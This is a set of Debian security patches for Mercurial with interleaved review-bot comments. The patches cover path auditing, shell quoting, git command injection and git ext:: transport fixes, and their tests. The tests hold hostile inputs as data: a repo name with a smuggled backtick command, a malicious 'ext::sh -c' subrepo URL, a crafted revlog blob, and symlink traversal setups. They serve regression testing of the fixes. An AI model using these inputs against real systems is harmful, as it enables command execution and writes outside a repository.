@@ -303,24 +309,28 @@ class vfs(abstractvfs): This class is used to hide the details of COW semantics and remote file access from higher level code. + 'cacheaudited' should be enabled only if (a) vfs object is short-lived, or + (b) the base directory is managed by hg and considered sort-of append-only. + See pathutil.pathauditor() for details. ''' - def __init__(self, base, audit=True, expandpath=False, realpath=False): + def __init__(self, base, audit=True, expandpath=False, realpath=False, cacheaudited=False): if expandpath: base = util.expandpath(base) if realpath: base = os.path.realpath(base) self.base = base + self._cached = cacheaudited self._setmustaudit(audit) self.createmode = None self._trustnlink = None def _getmustaudit(self): return self._audit def _setmustaudit(self, onoff): self._audit = onoff if onoff: - self.audit = pathauditor(self.base) + self.audit = pathauditor(self.base, self._cached) else: self.audit = util.always @@ -778,7 +788,7 @@ def _interestingfiles(repo, matcher): This is different from dirstate.status because it doesn't care about whether files are modified or clean.''' added, unknown, deleted, removed = [], [], [], [] - audit_path = pathauditor(repo.root) + audit_path = pathauditor(repo.root, cached=True) ctx = repo[None] dirstate = repo.dirstate --- a/tests/test-audit-path.t +++ b/tests/test-audit-path.t 
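Review bot: In `vfs._setmustaudit` the new call `pathauditor(self.base, self._cached)` passes the flag positionally. With the signature this patch gives the class, `__init__(self, root, callback=None, cached=False)`, the second positional argument is `callback`, not `cached`. So `cacheaudited=True` never enables the cache for a vfs, and the auditor receives a boolean where a callable is expected; how `callback` is used is outside the hunk, so the effect of that is unconfirmed. The other call sites in this patch use the keyword and this one should too: `self.audit = pathauditor(self.base, cached=self._cached)`. The vfs docstring also points to `pathutil.pathauditor()`, while the class patched here lives in scmutil.py.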
@@ -90,3 +90,99 @@ attack /tmp/test [255] $ cd .. + +Test symlink traversal on merge: +-------------------------------- + +#if symlink + +set up symlink hell + + $ mkdir merge-symlink-out + $ hg init merge-symlink + $ cd merge-symlink + $ touch base + $ hg commit -qAm base + $ ln -s ../merge-symlink-out a + $ hg commit -qAm 'symlink a -> ../merge-symlink-out' + $ hg up -q 0 + $ mkdir a + $ touch a/poisoned + $ hg commit -qAm 'file a/poisoned' + $ hg log --template '{rev}: {desc}\n' + 2: file a/poisoned + 1: symlink a -> ../merge-symlink-out + 0: base + + +try trivial merge + + $ hg up -qC 1 + $ hg merge 2 + abort: path 'a/poisoned' traverses symbolic link 'a' + [255] + +try rebase onto other revision: cache of audited paths should be discarded, ++and the rebase should fail (issue5628) + + $ hg up -qC 2 + $ hg rebase -s 2 -d 1 --config extensions.rebase= + abort: path 'a/poisoned' traverses symbolic link 'a' + [255] + $ ls ../merge-symlink-out + + $ cd .. + +Test symlink traversal on update: +--------------------------------- + + $ mkdir update-symlink-out + $ hg init update-symlink + $ cd update-symlink + $ ln -s ../update-symlink-out a + $ hg commit -qAm 'symlink a -> ../update-symlink-out' + $ hg rm a + $ mkdir a && touch a/b + $ hg ci -qAm 'file a/b' a/b + $ hg up -qC 0 + $ hg rm a + $ mkdir a && touch a/c + $ hg ci -qAm 'rm a, file a/c' + $ hg log --template '{rev}: {desc}\n' + 2: rm a, file a/c + 1: file a/b + 0: symlink a -> ../update-symlink-out + + +try linear update where symlink already exists: + + $ hg up -qC 0 + $ hg up 1 + abort: path 'a/b' traverses symbolic link 'a' + [255] + + +try linear update including symlinked directory and its content: paths are +audited first by calculateupdates(), where no symlink is created so both +'a' and 'a/b' are taken as good paths. still applyupdates() should fail. 
+ + $ hg up -qC null + $ hg up 1 + abort: path 'a/b' traverses symbolic link 'a' + [255] + $ ls ../update-symlink-out + +try branch update replacing directory with symlink, and its content: the +path 'a' is audited as a directory first, which should be audited again as +a symlink. + + $ rm -f a + $ hg up -qC 2 + $ hg up 1 + abort: path 'a/b' traverses symbolic link 'a' + [255] + $ ls ../update-symlink-out + + $ cd .. + +#endif --- a/tests/test-commandserver.py +++ b/tests/test-commandserver.py @@ -240,6 +240,30 @@ def hgignore(server): f.close() runcommand(server, ['status', '-i', '-u']) + +def symlink_hell(): + os.system("mkdir merge-symlink-out") + os.system("hg init merge-symlink") + os.chdir("merge-symlink") + os.system("touch base") + os.system("hg commit -qAm base") + os.system("ln -s ../merge-symlink-out a") + os.system("hg commit -qAm 'symlink a -> ../merge-symlink-out'") + os.system("hg up -q 0") + os.system("mkdir a") + os.system("touch a/poisoned") + os.system("hg commit -qAm 'file a/poisoned'") + + +def merge(server): + readchannel(server) + # audit a/poisoned as a good path + runcommand(server, ['up', '-qC', '2']) + runcommand(server, ['up', '-qC', '1']) + # here a is a symlink, so a/poisoned is bad + runcommand(server, ['merge', '2']) + + def phasecacheafterstrip(server): readchannel(server) @@ -285,3 +309,10 @@ if __name__ == '__main__': check(branch) check(hgignore) check(phasecacheafterstrip) + + symlink_hell() + os.system("hg up -q null") + check(merge) + if os.path.exists("../merge-symlink-out/poisoned"): + raise AssertionError('../merge-symlink-out/poisoned should not exist: server vulnerable to symlink traversal') + --- a/tests/test-commandserver.py.out +++ b/tests/test-commandserver.py.out 
@@ -191,3 +191,10 @@ o 0:eff892de26ec 5: public runcommand branches default 1:731265503d86 + +testing merge: + + runcommand up -qC 2 + runcommand up -qC 1 + runcommand merge 2 +abort: path 'a/poisoned' traverses symbolic link 'a' debian/patches/from_upstream__sshpeer_more_thorough_shell_quoting.patch0000664000000000000000000000212112540323345024306 0ustar Origin: http://selenic.com/hg/rev/e3f30068d2eb Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=783237 Description: sshpeer: more thorough shell quoting This fixes CVE-2014-9462 Applied-Upstream: 3.2.4 diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -20,6 +20,8 @@ class remotelock(object): self.release() def _serverquote(s): + if not s: + return s '''quote a string for the remote shell ... which we assume is sh''' if re.match('[a-zA-Z0-9@%_+=:,./-]*$', s): return s @@ -45,7 +47,10 @@ class sshpeer(wireproto.wirepeer): sshcmd = self.ui.config("ui", "ssh", "ssh") remotecmd = self.ui.config("ui", "remotecmd", "hg") - args = util.sshargs(sshcmd, self.host, self.user, self.port) + args = util.sshargs(sshcmd, + _serverquote(self.host), + _serverquote(self.user), + _serverquote(self.port)) if create: cmd = '%s %s %s' % (sshcmd, args, debian/patches/CVE-2016-3069_part3.patch0000664000000000000000000000352513373604067014371 0ustar # HG changeset patch # User Mateusz Kwapich # Date 1458691511 25200 # Node ID b732e7f2aba4c4c417278c7c7488006301551855 # Parent cdda7b96afff3433eafdeeb83ded83a5b25b7a5b convert: dead code removal - old git calling functions (SEC) CVE-2016-3069 (3/5) diff -r cdda7b96afff -r b732e7f2aba4 hgext/convert/git.py --- a/hgext/convert/git.py Tue Mar 22 17:05:11 2016 -0700 +++ b/hgext/convert/git.py Tue Mar 22 17:05:11 2016 -0700 
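Review bot: In `_serverquote` (mercurial/sshpeer.py) the new `if not s: return s` guard was inserted above the string literal that used to be the function's docstring. That literal is now an ordinary expression statement and the function has no docstring. Moving the two guard lines below the literal restores the documentation without changing behaviour. Since `self.host`, `self.user` and `self.port` are now all passed through this function, a comment such as `# unset host/user/port values are returned untouched` would explain why empty values skip quoting.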
@@ -29,32 +29,6 @@ class convert_git(converter_source, commandline): # Windows does not support GIT_DIR= construct while other systems # cannot remove environment variable. Just assume none have # both issues. - if util.safehasattr(os, 'unsetenv'): - def gitopen(self, s, err=None): - prevgitdir = os.environ.get('GIT_DIR') - os.environ['GIT_DIR'] = self.path - try: - if err == subprocess.PIPE: - (stdin, stdout, stderr) = util.popen3(s) - return stdout - elif err == subprocess.STDOUT: - return self.popen_with_stderr(s) - else: - return util.popen(s, 'rb') - finally: - if prevgitdir is None: - del os.environ['GIT_DIR'] - else: - os.environ['GIT_DIR'] = prevgitdir - else: - def gitopen(self, s, err=None): - if err == subprocess.PIPE: - (sin, so, se) = util.popen3('GIT_DIR=%s %s' % (self.path, s)) - return so - elif err == subprocess.STDOUT: - return self.popen_with_stderr(s) - else: - return util.popen('GIT_DIR=%s %s' % (self.path, s), 'rb') def _gitcmd(self, cmd, *args, **kwargs): return cmd('--git-dir=%s' % self.path, *args, **kwargs) debian/patches/CVE-2016-3069_part4.patch0000664000000000000000000000265713375254057014401 0ustar # HG changeset patch # User Mateusz Kwapich # Date 1458692847 25200 # Node ID ae279d4a19e9683214cbd1fe8298cf0b50571432 # Parent 80cac1de6aea89f9d068abb09b0ea58c70bd7130 convert: test for shell injection in git calls (SEC) CVE-2016-3069 (5/5) Before recent refactoring we were not escaping calls to git at all which made such injections possible. Let's have a test for that to avoid this problem in the future. Reported by Blake Burkhart. diff -r 80cac1de6aea -r ae279d4a19e9 tests/test-convert-git.t --- a/tests/test-convert-git.t Tue Mar 22 17:05:11 2016 -0700 +++ b/tests/test-convert-git.t Tue Mar 22 17:27:27 2016 -0700 
@@ -393,3 +393,20 @@ damage git repository by renaming a tree object $ mv git-repo4/.git/objects/$TREE_OBJ git-repo4/.git/objects/$TREE_OBJ.tmp $ hg convert git-repo4 git-repo4-broken-hg 2>&1 | grep 'abort:' abort: cannot read changes in 1c0ce3c5886f83a1d78a7b517cdff5cf9ca17bdd + +test for escaping the repo name (CVE-2016-3069) + + $ git init '`echo pwned >COMMAND-INJECTION`' + Initialized empty Git repository in $TESTTMP/`echo pwned >COMMAND-INJECTION`/.git/ + $ cd '`echo pwned >COMMAND-INJECTION`' + $ git commit -q --allow-empty -m 'empty' + $ cd .. + $ hg convert '`echo pwned >COMMAND-INJECTION`' 'converted' + initializing destination converted repository + scanning source... + sorting... + converting... + 0 empty + updating bookmarks + $ test -f COMMAND-INJECTION + [1] debian/patches/for_upstream__lenient_test-shelve.patch0000664000000000000000000000215012261277251020551 0ustar Author: Tristan Seligmann Description: Make test-shelve.t more lenient When running on a slower system (eg. MIPS buildd), the age of the shelf can be 10 seconds or more, resulting in the output alignment changing and thus a test failure. This patch makes the spacing be matched more leniently. Bug: http://bz.selenic.com/show_bug.cgi?id=4124 Index: mercurial-2.8.1/tests/test-shelve.t =================================================================== --- mercurial-2.8.1.orig/tests/test-shelve.t 2013-12-02 04:51:10.000000000 +0200 +++ mercurial-2.8.1/tests/test-shelve.t 2013-12-08 01:28:17.505760594 +0200 @@ -80,12 +80,12 @@ ensure that our shelved changes exist - $ hg shelve -l - default-01 (*) [mq]: second.patch (glob) - default (*) [mq]: second.patch (glob) + $ sleep 10 && hg shelve -l + default-01 (*)* [mq]: second.patch (glob) + default (*)* [mq]: second.patch (glob) $ hg shelve -l -p default - default (*) [mq]: second.patch (glob) + default (*)* [mq]: second.patch (glob) diff --git a/a/a b/a/a 
--- a/a/a debian/patches/CVE-2016-3068.patch0000664000000000000000000000707013374627525013263 0ustar # HG changeset patch # User Mateusz Kwapich # Date 1458535941 25200 # Node ID 34d43cb85de8d06764039d8868eee19d00fddeab # Parent b9714d958e89cd6ff1da46b46f39076c03325ac7 subrepo: set GIT_ALLOW_PROTOCOL to limit git clone protocols (SEC) CVE-2016-3068 (1/1) Git's git-remote-ext remote helper provides an ext:: URL scheme that allows running arbitrary shell commands. This feature allows implementing simple git smart transports with a single shell shell command. However, git submodules could clone arbitrary URLs specified in the .gitmodules file. This was reported as CVE-2015-7545 and fixed in git v2.6.1. However, if a user directly clones a malicious ext URL, the git client will still run arbitrary shell commands. Mercurial is similarly effected. Mercurial allows specifying git repositories as subrepositories. Git ext:: URLs can be specified as Mercurial subrepositories allowing arbitrary shell commands to be run on `hg clone ...`. The Mercurial community would like to thank Blake Burkhart for reporting this issue. The description of the issue is copied from Blake's report. This commit changes submodules to pass the GIT_ALLOW_PROTOCOL env variable to git commands with the same list of allowed protocols that git submodule is using. When the GIT_ALLOW_PROTOCOL env variable is already set, we just pass it to git without modifications. diff -r b9714d958e89 -r 34d43cb85de8 mercurial/subrepo.py --- a/mercurial/subrepo.py Wed Mar 16 17:30:26 2016 -0700 +++ b/mercurial/subrepo.py Sun Mar 20 21:52:21 2016 -0700 
@@ -1091,6 +1091,11 @@ class gitsubrepo(abstractsubrepo): are not supported and very probably fail. """ self._ui.debug('%s: git %s\n' % (self._relpath, ' '.join(commands))) + if env is None: + env = os.environ.copy() + # fix for Git CVE-2015-7545 + if 'GIT_ALLOW_PROTOCOL' not in env: + env['GIT_ALLOW_PROTOCOL'] = 'file:git:http:https:ssh' # unless ui.quiet is set, print git's stderr, # which is mostly progress and useful info errpipe = None diff -r b9714d958e89 -r 34d43cb85de8 tests/test-subrepo-git.t --- a/tests/test-subrepo-git.t Wed Mar 16 17:30:26 2016 -0700 +++ b/tests/test-subrepo-git.t Sun Mar 20 21:52:21 2016 -0700 
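Review bot: The comment `# fix for Git CVE-2015-7545` does not say that a `GIT_ALLOW_PROTOCOL` value already present in the environment is passed to git unchanged. The second test added to tests/test-subrepo-git.t relies on exactly that: `GIT_ALLOW_PROTOCOL=ext` re-enables the `ext` transport. I would extend the comment to `# default protocol allow-list (Git CVE-2015-7545); a pre-set GIT_ALLOW_PROTOCOL is honoured as-is, as git submodule does`. Separately, if the second `if` sits at function level, as the flattened hunk suggests, a caller-supplied `env` dictionary is modified in place; `env = dict(env)` before the assignment would avoid that. The enclosing method starts outside the hunk.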
@@ -566,3 +566,37 @@ traceback #endif $ cd .. + +test for Git CVE-2016-3068 + $ hg init malicious-subrepository + $ cd malicious-subrepository + $ echo "s = [git]ext::sh -c echo% pwned% >&2" > .hgsub + $ git init s + Initialized empty Git repository in $TESTTMP/malicious-subrepository/s/.git/ + $ cd s + $ git commit --allow-empty -m 'empty' + [master (root-commit) 153f934] empty + $ cd .. + $ hg add .hgsub + $ hg commit -m "add subrepo" + $ cd .. + $ env -u GIT_ALLOW_PROTOCOL hg clone malicious-subrepository malicious-subrepository-protected + Cloning into '$TESTTMP/malicious-subrepository-protected/s'... + fatal: transport 'ext' not allowed + updating to branch default + cloning subrepo s from ext::sh -c echo% pwned% >&2 + abort: git clone error 128 in s (in subrepo s) + [255] + +whitelisting of ext should be respected (that's the git submodule behaviour) + $ env GIT_ALLOW_PROTOCOL=ext hg clone malicious-subrepository malicious-subrepository-clone-allowed + Cloning into '$TESTTMP/malicious-subrepository-clone-allowed/s'... + pwned + fatal: Could not read from remote repository. + + Please make sure you have the correct access rights + and the repository exists. + updating to branch default + cloning subrepo s from ext::sh -c echo% pwned% >&2 + abort: git clone error 128 in s (in subrepo s) + [255] debian/patches/CVE-2016-3630_part1.patch0000664000000000000000000000302213373604116014344 0ustar # HG changeset patch # User Matt Mackall # Date 1458174569 25200 # Node ID b6ed2505d6cf1d73f7f5c62e7369c4ce65cd3732 # Parent a2c2dd399f3b9fb84edd75a930e895f0c5e4ad5b parsers: fix list sizing rounding error (SEC) CVE-2016-3630 (1/2) This addresses part of a vulnerability in application of binary deltas. diff -r a2c2dd399f3b -r b6ed2505d6cf mercurial/mpatch.c --- a/mercurial/mpatch.c Fri Mar 25 10:47:49 2016 -0700 +++ b/mercurial/mpatch.c Wed Mar 16 17:29:29 2016 -0700 
@@ -205,7 +205,7 @@ static struct flist *decode(const char *bin, Py_ssize_t len) int pos = 0; /* assume worst case size, we won't have many of these lists */ - l = lalloc(len / 12); + l = lalloc(len / 12 + 1); if (!l) return NULL; diff -r a2c2dd399f3b -r b6ed2505d6cf tests/test-revlog.t --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tests/test-revlog.t Wed Mar 16 17:29:29 2016 -0700 @@ -0,0 +1,15 @@ +Test for CVE-2016-3630 + + $ hg init + + >>> open("a.i", "w").write( + ... """eJxjYGZgZIAAYQYGxhgom+k/FMx8YKx9ZUaKSOyqo4cnuKb8mbqHV5cBCVTMWb1Cwqkhe4Gsg9AD + ... Joa3dYtcYYYBAQ8Qr4OqZAYRICPTSr5WKd/42rV36d+8/VmrNpv7NP1jQAXrQE4BqQUARngwVA==""" + ... .decode("base64").decode("zlib")) + + $ hg debugindex a.i + rev offset length delta linkrev nodeid p1 p2 + 0 0 19 -1 2 99e0332bd498 000000000000 000000000000 + 1 19 12 0 3 6674f57a23d8 99e0332bd498 000000000000 + $ hg debugdata a.i 1 2>&1 | grep decoded + mpatch.mpatchError: patch cannot be decoded debian/patches/deb_specific__hgk.py.patch0000664000000000000000000000101012230221467015645 0ustar Set default hgk path for hgk outside bin. --- a/hgext/hgk.py +++ b/hgext/hgk.py @@ -313,7 +313,7 @@ def view(ui, repo, *etc, **opts): "start interactive history viewer" os.chdir(repo.root) optstr = ' '.join(['--%s %s' % (k, v) for k, v in opts.iteritems() if v]) - cmd = ui.config("hgk", "path", "hgk") + " %s %s" % (optstr, " ".join(etc)) + cmd = ui.config("hgk", "path", "/usr/share/mercurial/hgk") + " %s %s" % (optstr, " ".join(etc)) ui.debug("running %s\n" % cmd) util.system(cmd) debian/patches/CVE-2017-17458_part1.patch0000664000000000000000000000470513373604252014454 0ustar --- /dev/null +++ b/tests/test-audit-subrepo.t 
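Review bot: In decode() in mercurial/mpatch.c the comment above the allocation still reads only "assume worst case size", so nothing explains why `len / 12 + 1` is the right bound rather than `len / 12`. A short addition such as `/* a trailing fragment shorter than 12 bytes still takes a list slot, hence + 1 */` would record the reasoning, assuming that is the rounding case the commit message refers to. The context also shows `int pos` next to `Py_ssize_t len`; if `pos` is compared with or advanced by `len` further down, declaring it `Py_ssize_t pos = 0;` would keep the two the same width. The loop that fills the list is outside the hunk and the commit message says this is part 1 of 2, so the bounds checks themselves cannot be judged from here.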
@@ -0,0 +1,114 @@ +Test illegal name +----------------- + +on commit: + + $ hg init hgname + $ cd hgname + $ mkdir sub + $ hg init sub/.hg + $ echo 'sub/.hg = sub/.hg' >> .hgsub + $ hg ci -qAm 'add subrepo "sub/.hg"' + abort: path 'sub/.hg' is inside nested repo 'sub' + [255] + +prepare tampered repo (including the commit above): + + $ hg import --bypass -qm 'add subrepo "sub/.hg"' - <<'EOF' + > diff --git a/.hgsub b/.hgsub + > new file mode 100644 + > --- /dev/null + > +++ b/.hgsub + > @@ -0,0 +1,1 @@ + > +sub/.hg = sub/.hg + > diff --git a/.hgsubstate b/.hgsubstate + > new file mode 100644 + > --- /dev/null + > +++ b/.hgsubstate + > @@ -0,0 +1,1 @@ + > +0000000000000000000000000000000000000000 sub/.hg + > EOF + $ cd .. + +on clone (and update): + + $ hg clone -q hgname hgname2 + abort: path 'sub/.hg' is inside nested repo 'sub' + [255] + +Test direct symlink traversal +----------------------------- + +#if symlink + +on commit: + + $ mkdir hgsymdir + $ hg init hgsymdir/root + $ cd hgsymdir/root + $ ln -s ../out + $ hg ci -qAm 'add symlink "out"' + $ hg init ../out + $ echo 'out = out' >> .hgsub +BROKEN: should fail + $ hg ci -qAm 'add subrepo "out"' + $ cd ../.. + +on clone (and update): + + $ mkdir hgsymdir2 +BROKEN: should fail to update + $ hg clone -q hgsymdir/root hgsymdir2/root + $ ls hgsymdir2 + out + root + +#endif + +Test indirect symlink traversal +------------------------------- + +#if symlink + +on commit: + + $ mkdir hgsymin + $ hg init hgsymin/root + $ cd hgsymin/root + $ ln -s ../out + $ hg ci -qAm 'add symlink "out"' + $ mkdir ../out + $ hg init ../out/sub + $ echo 'out/sub = out/sub' >> .hgsub + $ hg ci -qAm 'add subrepo "out/sub"' + abort: path 'out/sub' traverses symbolic link 'out' + [255] + +prepare tampered repo (including the commit above): + + $ hg import --bypass -qm 'add subrepo "out/sub"' - <<'EOF' + > diff --git a/.hgsub b/.hgsub + > new file mode 100644 + > --- /dev/null + > +++ b/.hgsub + > @@ -0,0 +1,1 @@ + > +out/sub = out/sub + 
> diff --git a/.hgsubstate b/.hgsubstate + > new file mode 100644 + > --- /dev/null + > +++ b/.hgsubstate + 
> @@ -0,0 +1,1 @@ + > +0000000000000000000000000000000000000000 out/sub + > EOF + $ cd ../.. + +on clone (and update): + + $ mkdir hgsymin2 + $ hg clone -q hgsymin/root hgsymin2/root + abort: path 'out/sub' traverses symbolic link 'out' + [255] + $ ls hgsymin2 + root + +#endif debian/patches/series0000664000000000000000000000201213375562420012036 0ustar deb_specific__support_templates_in_fsh.patch deb_specific__support_help_in_fhs.patch deb_specific__use_sensible-editor.patch deb_specific__hgk.py.patch deb_specific__optional-dependencies proposed_upstream__correct-zeroconf-doc deb_specific__support_mo_in_fhs.patch deb_specific__disable_libdir_replacement.patch deb_specific__fix_hg-ssh_interpreter.patch for_upstream__dont_rm_usr_bin_python_when_running_testsuite.patch for_upstream__lenient_test-shelve.patch CVE-2014-9390.pt1 CVE-2014-9390.pt2 CVE-2014-9390.pt4 from_upstream__sshpeer_more_thorough_shell_quoting.patch fix_ftbfs_patchbomb_test.patch CVE-2016-3068.patch CVE-2016-3069_part1.patch CVE-2016-3069_part2.patch CVE-2016-3069_part3.patch CVE-2016-3069_part4.patch CVE-2016-3105.patch CVE-2016-3630_part1.patch CVE-2016-3630_part2.patch CVE-2017-9462.patch CVE-2017-17458_part1.patch CVE-2017-17458_part2.patch CVE-2017-1000115.patch CVE-2017-1000116.patch CVE-2018-13347.patch CVE-2018-13347-extras.patch CVE-2018-13346.patch CVE-2018-13348.patch CVE-2018-1000132.patch debian/patches/deb_specific__disable_libdir_replacement.patch0000664000000000000000000000151112230221466021761 0ustar Description: Disabled hginstallscripts @LIBDIR@ replacement in setup.py. setup.py replaces @LIBDIR@ in the hg script, with a path that differs between Python verisons. libdir in hg doesn't need to be set if mercurial is available in the public namespace, as it is in Debian. hg doesn't alter sys.paths if this replacement hasn't happened. 
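Review bot: In the "Test direct symlink traversal" section of tests/test-audit-subrepo.t the two steps marked `BROKEN: should fail` (the `hg ci` of subrepo "out" and the `hg clone -q hgsymdir/root hgsymdir2/root`) record the unsafe result as the expected output, so this file passes while a subrepo path that is itself a symlink is still accepted. Only the `sub/.hg` and indirect-symlink cases are asserted to abort. The series file lists CVE-2017-17458_part2.patch after this one; presumably it flips these expectations. It is worth confirming that the final test shows an `abort:` line and `[255]` for both steps and that `ls hgsymdir2` no longer lists `out`.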
Author: Stefano Rivera Bug-Debian: http://bugs.debian.org/620087 Bug-Ubuntu: https://bugs.launchpad.net/bugs/745250 Forwarded: not-needed Last-Update: 2011-03-30 --- a/setup.py +++ b/setup.py @@ -413,7 +413,6 @@ cmdclass = {'build': hgbuild, 'build_ext': hgbuildext, 'build_py': hgbuildpy, 'build_hgextindex': buildhgextindex, - 'install_scripts': hginstallscripts, 'build_hgexe': buildhgexe, } debian/patches/deb_specific__support_help_in_fhs.patch0000664000000000000000000000123112231045361020522 0ustar Author: Vernon Tang Description: Support installation of help topics in FHS. Forwarded: not-needed --- a/mercurial/help.py +++ b/mercurial/help.py @@ -131,9 +131,11 @@ def loaddoc(topic): module = __file__ base = os.path.dirname(module) + docdir = '/usr/share/mercurial/help' for dir in ('.', '..'): - docdir = os.path.join(base, dir, 'help') - if os.path.isdir(docdir): + tmpdocdir = os.path.join(base, dir, 'help') + if os.path.isdir(tmpdocdir): + docdir = tmpdocdir break path = os.path.join(docdir, topic + ".txt") debian/patches/fix_ftbfs_patchbomb_test.patch0000664000000000000000000003525712540344171016705 0ustar Description: fix patchbomb test Origin: backported from 3.1.1 Index: mercurial-2.8.2/tests/test-patchbomb.t =================================================================== --- mercurial-2.8.2.orig/tests/test-patchbomb.t 2015-06-17 15:20:05.254972546 -0400 +++ mercurial-2.8.2/tests/test-patchbomb.t 2015-06-17 15:20:21.699148136 -0400 
@@ -1,3 +1,28 @@ +Note for future hackers of patchbomb: this file is a bit heavy on +wildcards in test expectations due to how many things like hostnames +tend to make it into outputs. As a result, you may need to perform the +following regular expression substitutions: +@$HOSTNAME> -> @*> (glob) +Mercurial-patchbomb/.* -> Mercurial-patchbomb/* (glob) +/mixed; boundary="===+[0-9]+==" -> /mixed; boundary="===*== (glob)" +--===+[0-9]+=+--$ -> --===*=-- (glob) +--===+[0-9]+=+$ -> --===*= (glob) + + $ cat > prune-blank-after-boundary.py < import sys + > skipblank = False + > trim = lambda x: x.strip(' \r\n') + > for l in sys.stdin: + > if trim(l).endswith('=--') or trim(l).endswith('=='): + > skipblank = True + > print l, + > continue + > if not trim(l) and skipblank: + > continue + > skipblank = False + > print l, + > EOF + $ FILTERBOUNDARY="python `pwd`/prune-blank-after-boundary.py" $ echo "[extensions]" >> $HGRCPATH $ echo "patchbomb=" >> $HGRCPATH @@ -195,12 +220,12 @@ test bundle and description: $ hg email --date '1970-1-1 0:3' -n -f quux -t foo \ - > -c bar -s test -r tip -b --desc description + > -c bar -s test -r tip -b --desc description | $FILTERBOUNDARY searching for changes 1 changesets found displaying test ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: test Message-Id: (glob) @@ -210,7 +235,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -219,7 +244,7 @@ description - --===* (glob) + --===*= (glob) Content-Type: application/x-mercurial-bundle MIME-Version: 1.0 Content-Disposition: attachment; filename="bundle.hg" 
@@ -232,7 +257,7 @@ SlIBpFisgGkyRjX//TMtfcUAEsGu56+YnE1OlTZmzKm8BSu2rvo4rHAYYaadIFFuTy0LYgIkgLVD sgVa2F19D1tx9+hgbAygLgQwaIqcDdgA4BjQgIiz/AEP72++llgDKhKducqodGE4B0ETqF3JFOFC Q70eyNw= - --===*-- (glob) + --===*=-- (glob) utf-8 patch: $ python -c 'fp = open("utf", "wb"); fp.write("h\xC3\xB6mma!\n"); fp.close();' @@ -646,12 +671,12 @@ test inline for single patch: - $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -i -r 2 + $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -i -r 2 | $FILTERBOUNDARY this patch series consists of 1 patches. displaying [PATCH] test ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH] test X-Mercurial-Node: ff2c9fa2018b15fa74b33363bda9527323e2a99f @@ -662,7 +687,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -682,16 +707,16 @@ @@ -0,0 +1,1 @@ +c - --===*-- (glob) + --===*=-- (glob) test inline for single patch (quoted-printable): - $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -i -r 4 + $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -i -r 4 | $FILTERBOUNDARY this patch series consists of 1 patches. displaying [PATCH] test ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH] test X-Mercurial-Node: a2ea8fc83dd8b93cfd86ac97b28287204ab806e1 @@ -702,7 +727,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable 
@@ -738,11 +763,11 @@ + +bar - --===*-- (glob) + --===*=-- (glob) test inline for multiple patches: $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -i \ - > -r 0:1 -r 4 + > -r 0:1 -r 4 | $FILTERBOUNDARY this patch series consists of 3 patches. @@ -763,7 +788,7 @@ displaying [PATCH 1 of 3] a ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH 1 of 3] a X-Mercurial-Node: 8580ff50825a50c8f716709acdf8de0deddcd6ab @@ -776,7 +801,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -796,9 +821,9 @@ @@ -0,0 +1,1 @@ +a - --===*-- (glob) + --===*=-- (glob) displaying [PATCH 2 of 3] b ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH 2 of 3] b X-Mercurial-Node: 97d72e5f12c7e84f85064aa72e5a297142c36ed9 @@ -811,7 +836,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -831,9 +856,9 @@ @@ -0,0 +1,1 @@ +b - --===*-- (glob) + --===*=-- (glob) displaying [PATCH 3 of 3] long line ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH 3 of 3] long line X-Mercurial-Node: a2ea8fc83dd8b93cfd86ac97b28287204ab806e1 @@ -846,7 +871,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable 
